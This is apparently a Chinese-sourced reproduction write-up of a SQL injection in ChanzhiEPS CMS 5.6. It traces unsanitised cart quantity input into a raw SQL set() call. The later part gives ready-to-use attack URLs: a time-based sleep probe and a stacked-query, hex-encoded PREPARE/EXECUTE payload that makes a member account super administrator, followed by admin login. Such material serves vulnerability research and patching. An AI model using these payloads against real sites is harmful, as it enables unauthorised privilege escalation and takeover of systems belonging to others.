HTTPS://SHARE.WEIYUN.COM/5CBFF06337D32A9748D0F1BEAD5DDBD5
Front-end injection
The add() method in /chanzhieps/system/module/cart/control.php:

public function add($product, $count)
{
    if($this->app->user->account == 'guest')
    {
        /* Save info to cookie if user is guest. */
        $this->cart->addInCookie($product, $count);
        $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
    }
    else
    {
        $result = $this->cart->add($product, $count);
        if($result) $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
        $this->send(array('result' => 'fail', 'message' => dao::getError()));
    }
}

$count is user input: it is the last segment of the cart-add-<product>-<count> URL and arrives in add() without being cast or validated.
Follow the branch taken by a logged-in member, that is,
$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php
public function add($productID, $count)
{
    $hasProduct = $this->dao->select('count(id) as count')->from(TABLE_CART)
        ->where('account')->eq($this->app->user->account)
        ->andWhere('product')->eq($productID)
        ->fetch('count');
    if(!$hasProduct)
    {
        $product = new stdclass();
        $product->product = $productID;
        $product->account = $this->app->user->account;
        $product->count   = $count;
        $this->dao->insert(TABLE_CART)->data($product)->exec();
    }
    else
    {
        $this->dao->update(TABLE_CART)->set("count= count + {$count}")
            ->where('account')->eq($this->app->user->account)
            ->andWhere('product')->eq($productID)
            ->exec();
    }
    return !dao::isError();
}
If the product is already in the cart, the quantity is updated with set("count= count + {$count}"), so $count is interpolated straight into the SQL fragment. Note that the first add of a given product takes the insert()->data() branch instead; the update branch, and with it the injection, is only reached once the product is already in the cart, so the request has to be sent for the same product ID a second time.
Follow set() into the dao:
/chanzhieps/system/lib/base/dao/dao.class.php
public function set($set)
{
    /* Add ` to avoid keywords of MySQL. */
    if(strpos($set, '=') === false)
    {
        $set = str_replace(',', '', $set);
        $set = '`' . str_replace('`', '', $set) . '`';
    }
    $this->sql .= $this->isFirstSet ? " $set" : ", $set";
    if($this->isFirstSet) $this->isFirstSet = false;
    return $this;
}

The argument is concatenated directly onto $this->sql. The only processing is the backtick wrapping for fragments that contain no '=', and "count= count + ..." contains one, so the string reaches the database exactly as it arrived in the URL. Unlike where()->eq(), which quotes the value it is given, set() has no way to tell SQL from data.
Test it with a time-based probe in the count slot:
http://localhost/www/index.php/cart-add-1-(select%20sleep(10))
The response is delayed by ten seconds, so the subquery is being executed and the injection is confirmed.
This CMS connects to MySQL through PDO, and the MySQL PDO driver accepts several ';'-separated statements in one query() call unless PDO::MYSQL_ATTR_MULTI_STATEMENTS has been switched off. Stacked queries therefore work here, which turns the UPDATE into a way to run an arbitrary statement of your own.
http://localhost/www/index.php/cart-add-1-1;set%20@x=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%20@x;execute%20x;select%201%20union%20select%201
(The user-variable name was mangled by e-mail obfuscation in the captured page; @x is assumed here, matching the prepare x from ... that follows.)
The count value closes the UPDATE with a harmless 1, then runs a second statement through PREPARE/EXECUTE. The hex literal is the statement itself, encoded so that no quote characters have to appear in the URL; it decodes to:
update eps_user set admin='super' where account='fuckyou';
This promotes the low-privileged member account to super administrator. The trailing select 1 union select 1 only gives the WHERE clause that the dao appends a statement to attach to; by then the UPDATE on eps_user has already run.
Then log in to the admin backend with that account.
[Reproduction] Chanzhi (ChanzhiEPS) CMS 5.6 front-end injection + getshell